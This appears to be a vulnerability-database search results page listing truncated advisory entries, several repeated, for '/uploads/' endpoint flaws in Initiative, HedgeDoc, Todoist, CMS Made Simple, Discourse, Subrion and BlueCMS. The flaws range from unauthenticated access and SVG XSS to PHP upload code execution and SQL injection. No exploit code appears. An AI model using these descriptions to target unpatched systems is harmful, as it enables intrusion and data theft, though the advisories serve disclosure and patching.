19 matches found
CVE-2026-28276 Initiative Allows Unauthenticated Access to Uploaded Documents via Public /uploads/ Endpoint
Initiative is a self-hosted project management platform. An access control vulnerability exists in Initiative versions prior to 0.32.2 where uploaded documents are served from a publicly accessible /uploads/ directory without any authentication or authorization checks. Any uploaded file can be...
CVE-2026-28276 Initiative Allows Unauthenticated Access to Uploaded Documents via Public /uploads/ Endpoint
Initiative is a self-hosted project management platform. An access control vulnerability exists in Initiative versions prior to 0.32.2 where uploaded documents are served from a publicly accessible /uploads/ directory without any authentication or authorization checks. Any uploaded file can be...
CVE-2026-25642
CVE-2026-25642 affects HedgeDoc; prior to version 1.10.6, the security policy for files served under /uploads/ was insufficient, resulting in a too open Content-Security-Policy and enabling hosting of malicious interactive content (e.g., fake login forms) via SVG files. The issue is fixed in 1.10...
PT-2026-6783
Name of the Vulnerable Software and Affected Versions HedgeDoc versions prior to 1.10.6 Description HedgeDoc is a real-time, collaborative, markdown notes application. Versions before 1.10.6 had a permissive Content-Security-Policy for files served under the /uploads/ endpoint. This allowed for t...
CVE-2025-63317
Todoist v8896 is vulnerable to Cross Site Scripting XSS in /api/v1/uploads. Uploaded SVG files have no sanitization applied, so embedded JavaScript executes when a user opens the attachment from a task/comment...
CVE-2025-63317
Todoist v8896 is affected by an XSS vulnerability in the /api/v1/uploads endpoint. Uploaded SVG files are not sanitized, allowing embedded JavaScript to execute when a user opens the attachment from a task or comment. The Red Hat and EU/NVD entries corroborate Todoist v8896 as vulnerable to SVG-b...
EUVD-2025-50830
An authenticated arbitrary file upload vulnerability in the /uploads/ endpoint of CMS Made Simple Foundation File Manager v2.2.22 allows attackers with Administrator privileges to execute arbitrary code via uploading a crafted PHP file...
CVE-2025-63678
An authenticated arbitrary file upload vulnerability in the /uploads/ endpoint of CMS Made Simple Foundation File Manager v2.2.22 allows attackers with Administrator privileges to execute arbitrary code via uploading a crafted PHP file...
CVE-2025-63678
Summary: CVE-2025-63678 affects CMS Made Simple Foundation File Manager v2.2.22. An authenticated attacker with Administrator privileges can upload a crafted PHP file to the /uploads/ endpoint, potentially leading to arbitrary code execution. This aligns with multiple sources in the connected doc...
CVE-2025-63678
An authenticated arbitrary file upload vulnerability in the /uploads/ endpoint of CMS Made Simple Foundation File Manager v2.2.22 allows attackers with Administrator privileges to execute arbitrary code via uploading a crafted PHP file...
CMSmadesimple 安全漏洞
CMSmadesimple is an open source content management system from the CMS Made Simple Foundation. A security vulnerability exists in CMSmadesimple version 2.2.22, which originates from the presence of an authenticated, arbitrary file upload in the /uploads/ endpoint and could lead to the execution o...
BIT-DISCOURSE-2024-24827 No rate limits on POST /uploads endpoint in Discourse
Discourse is an open source platform for community discussion. Without a rate limit on the POST /uploads endpoint, it makes it easier for an attacker to carry out a DoS attack on the server since creating an upload can be a resource intensive process. Do note that the impact varies from site to...
CVE-2024-24827
Discourse is an open source platform for community discussion. Without a rate limit on the POST /uploads endpoint, it makes it easier for an attacker to carry out a DoS attack on the server since creating an upload can be a resource intensive process. Do note that the impact varies from site to...
CVE-2024-24827 No rate limits on POST /uploads endpoint in Discourse
Discourse is an open source platform for community discussion. Without a rate limit on the POST /uploads endpoint, it makes it easier for an attacker to carry out a DoS attack on the server since creating an upload can be a resource intensive process. Do note that the impact varies from site to...
CVE-2024-24827 No rate limits on POST /uploads endpoint in Discourse
Discourse is an open source platform for community discussion. Without a rate limit on the POST /uploads endpoint, it makes it easier for an attacker to carry out a DoS attack on the server since creating an upload can be a resource intensive process. Do note that the impact varies from site to...
Discourse 安全漏洞
Discourse is an open source community discussion platform. The platform includes features such as community, email and chat rooms. Discourse suffers from a denial of service vulnerability that stems from the POST /uploads endpoint not being rate-limited. An attacker could exploit this vulnerabili...
PT-2024-20593 · Nginx +1 · Nginx +1
Name of the Vulnerable Software and Affected Versions: Discourse versions prior to the latest stable, beta and tests-passed version Description: The issue affects Discourse, an open source platform for community discussion, due to the lack of a rate limit on the "POST /uploads" endpoint. This mak...
PT-2018-14956 · Subrion · Subrion Cms
Name of the Vulnerable Software and Affected Versions: Subrion CMS version 4.2.1 Description: The issue allows remote attackers to execute arbitrary PHP code via a .pht or .phar file. This is because the .htaccess file omits these file types, specifically affecting the /panel/uploads endpoint...
PT-2018-13566 · Bluecms · Bluecms
Name of the Vulnerable Software and Affected Versions: BlueCMS version 1.6 Description: The issue allows SQL Injection via the user name parameter to the "uploads/user.php?act=index login" endpoint. Recommendations: For BlueCMS version 1.6, avoid using the user name parameter in the affected...